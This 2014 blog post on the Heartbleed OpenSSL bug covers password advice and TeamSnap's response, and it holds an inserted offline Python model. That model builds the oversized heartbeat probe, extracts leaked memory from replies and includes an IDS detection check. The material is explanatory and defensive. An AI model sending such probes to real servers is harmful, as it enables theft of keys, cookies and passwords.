John Galea's Blog


Heartbleed bug

Everyone, me included (personally and professionally), is scrambling to figure out what to do about this latest bug. Unless you live on another planet you have heard by now that a bug in OpenSSL, nicknamed Heartbleed (CVE-2014-0160), has become common knowledge. The bug has been in OpenSSL for about two years, since version 1.0.1 shipped in 2012, and it lets an attacker read chunks of a server's memory (up to 64 KB per request, and the request can be repeated as often as the attacker likes). Whatever happened to be in that memory can leak: session cookies, passwords, the server's private key, credit card numbers, addresses, SIN numbers, you name it. Frankly there is only so much you can do. But you have to start somewhere as an end user. The main issue IMHO is that companies are not being forthcoming about whether they were exposed and what they have done about it. The main thing you can do is change your passwords. If you reuse one password everywhere, a compromise of any one of your sites compromises all of your logons. But there is no point changing your password until the site itself has patched: a new password sent to a still-vulnerable server can be read out of memory just like the old one. One of the more proactive sites of all the organizations I log on to is TeamSnap. They stepped up, and here is what they said:

1) “To our knowledge, there were no attacks to TeamSnap or its stored data.” Frankly the exploit leaves no trace in ordinary server logs (a malicious heartbeat looks like any other TLS record and never reaches the web application), so knowing whether they were attacked and what was lost is not as easy as one might otherwise think.

2) “The OpenSSL folks have already put out a fix, which has been picked up widely. On the TeamSnap side, we found out about the bug — and the fix — when it was announced and immediately went into action. We checked to make sure all of our servers had the fix, we contacted our tech partners to make sure they knew about the bug and were also adopting the fix, and we revoked our previous security certificate and private key and issued new ones.” This is exactly what needs to be done to plug the hole, and all of these steps are necessary: patching OpenSSL stops the leak, but the old private key may already have been read out of memory, so the certificate has to be revoked and reissued with a fresh key, or anyone who captured the old key could keep impersonating the site.

But the reality is that all this does is stop future leaks; it does nothing to remediate data that has already been lost, because really nothing can be done about that.

3) “Despite the fact that we don’t think TeamSnap information was compromised, we highly suggest users to change their TeamSnap password.”

Kudos to TeamSnap. That’s the way every company should behave in a situation like this.

Yup, changing your password, especially on any web site that you care about or that holds personal info, credit cards, etc., is crucial. And wherever practical use a different password for each site. But it also helps to know that the site has fixed itself, as TeamSnap did above. If you can't find out (because the reality is that companies are hiding the facts, since they don't want to admit they were exposed and were running open source FREE software), there are a few test web sites out there that will check whether a given site is now patched. Check out filippo.io and LastPass. Now I can't vouch for whether these sites work or are accurate, but at least it's something to do.
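As an added example (not the blog's code and not the code of either checker site), here is a small offline Python model of what those checkers, and the bug itself, do at the TLS record level. It builds the oversized heartbeat request a checker sends, judges from the reply whether a server handed back memory, and applies the same length check an intrusion detection rule uses to spot the probe on the wire, which matters because, as noted above, nothing about it shows up in ordinary logs. The two model servers, the "process memory" and the probe reply are constructed stand-ins; nothing here touches the network.

```python
"""Offline model of the Heartbleed (CVE-2014-0160) probe and checks.
Added example: not the blog's or any checker site's code. The model
servers and the 'process memory' below are constructed samples."""
import struct
from dataclasses import dataclass

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16               # RFC 6520 minimum padding on a heartbeat message
HB_HEADER = 3                 # 1-byte type + 2-byte payload_length


@dataclass
class TLSRecord:
    content_type: int
    version: tuple
    fragment: bytes


def build_heartbeat_request(claimed_len, payload=b"", padding=b"", version=(3, 2)):
    """A well-formed request has claimed_len == len(payload). The Heartbleed
    probe lies: it claims e.g. 0x4000 bytes while sending none at all."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + padding
    return struct.pack("!BBBH", TLS_HEARTBEAT, *version, len(body)) + body


def parse_records(data):
    """Split a byte stream into TLS records; stop at a truncated record."""
    records, off = [], 0
    while off + 5 <= len(data):
        ctype, vmaj, vmin, length = struct.unpack("!BBBH", data[off:off + 5])
        frag = data[off + 5:off + 5 + length]
        if len(frag) < length:
            break
        records.append(TLSRecord(ctype, (vmaj, vmin), frag))
        off += 5 + length
    return records


def heartbeat_is_oversized(rec):
    """Detection check an IDS applies on the wire: claimed payload_length plus
    header and minimum padding must fit inside the record; if not, it is a probe."""
    if rec.content_type != TLS_HEARTBEAT or len(rec.fragment) < HB_HEADER:
        return False
    _, claimed = struct.unpack("!BH", rec.fragment[:HB_HEADER])
    return claimed + HB_HEADER + HB_PADDING > len(rec.fragment)


def leaked_bytes(response, sent_payload=b""):
    """Checker logic: a patched server answers an oversized probe with nothing
    (or an alert). A vulnerable one returns a heartbeat response carrying more
    payload than we sent; everything beyond our own payload is its memory."""
    for rec in parse_records(response):
        if rec.content_type != TLS_HEARTBEAT or len(rec.fragment) < HB_HEADER:
            continue
        hb_type, length = struct.unpack("!BH", rec.fragment[:HB_HEADER])
        payload = rec.fragment[HB_HEADER:HB_HEADER + length]
        if hb_type == HB_RESPONSE and len(payload) > len(sent_payload):
            return payload[len(sent_payload):]
    return b""


def vulnerable_server(request, process_memory):
    """Model of OpenSSL 1.0.1 to 1.0.1f: payload_length was trusted and that many
    bytes were copied from the request payload onward, past its end into heap."""
    rec = parse_records(request)[0]
    _, claimed = struct.unpack("!BH", rec.fragment[:HB_HEADER])
    heap = rec.fragment[HB_HEADER:] + process_memory  # our payload, then neighbours
    body = struct.pack("!BH", HB_RESPONSE, claimed) + heap[:claimed] + b"\0" * HB_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body


def patched_server(request):
    """Model of 1.0.1g: bounds-check payload_length against the record and
    silently discard anything that does not fit (as RFC 6520 requires)."""
    rec = parse_records(request)[0]
    _, claimed = struct.unpack("!BH", rec.fragment[:HB_HEADER])
    if HB_HEADER + claimed + HB_PADDING > len(rec.fragment):
        return b""
    echo = rec.fragment[HB_HEADER:HB_HEADER + claimed]
    body = struct.pack("!BH", HB_RESPONSE, claimed) + echo + b"\0" * HB_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body


# The classic probe, 18 03 02 00 03 01 40 00: claims 16 KiB, carries 0 bytes.
PROBE = build_heartbeat_request(0x4000)

# Constructed stand-in for heap contents next to the request buffer (not a capture).
FAKE_HEAP = (b"GET /account HTTP/1.1\r\nCookie: session=CONSTRUCTED_SAMPLE_TOKEN\r\n"
             + b"\0" * 0x4000)


def check_server(server):
    """Return (vulnerable?, leaked bytes) for a callable that answers PROBE."""
    leaked = leaked_bytes(server(PROBE), sent_payload=b"")
    return bool(leaked), leaked


if __name__ == "__main__":
    vuln, leak = check_server(lambda req: vulnerable_server(req, FAKE_HEAP))
    print("vulnerable model:", vuln, "leaked", len(leak), "bytes, starting", leak[:40])
    print("patched model:", check_server(patched_server)[0])
    print("probe flagged by IDS check:", heartbeat_is_oversized(parse_records(PROBE)[0]))
```

The same `leaked_bytes` test is what a live checker applies to a real server's reply after the TLS handshake; `heartbeat_is_oversized` is the check to put on inbound traffic if you want evidence of probing that the web server's own logs will never give you.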

You can also check Mashable and other such summaries of who was and was not exposed. Well, that's about it. I can only imagine how many identity thefts are going to come out of this mess.


April 16, 2014 - Posted by | Uncategorized
